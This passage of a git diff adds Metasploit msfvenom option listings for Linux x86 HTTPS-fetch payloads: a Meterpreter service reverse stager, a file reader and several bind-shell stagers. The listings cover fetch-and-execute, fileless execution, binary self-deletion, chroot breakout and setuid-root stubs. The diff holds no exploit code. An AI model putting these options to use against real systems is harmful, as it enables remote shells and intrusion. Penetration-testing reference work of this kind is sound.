stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..a260222 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt 
@@ -0,0 +1,100 @@ + + Name: HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/https/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/metsvc_reverse_tcp: +========================= + + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CVWKereJy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a 
stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt new file mode 100644 index 0000000..adec93f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt 
@@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Read File + Module: payload/cmd/linux/https/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kkoxgRfIJmAi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no 
Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..0936283 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt 
@@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VpfdGDrWDMN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..609a75f 
--- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,100 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eyiRmgIg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). 
+ + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular 
payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..9f47cdc 
--- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zHYaPgGJH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..d226d4a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt 
@@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UevlRPHWsW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..fa1cc6d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt 
@@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ayeQmgmImG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ 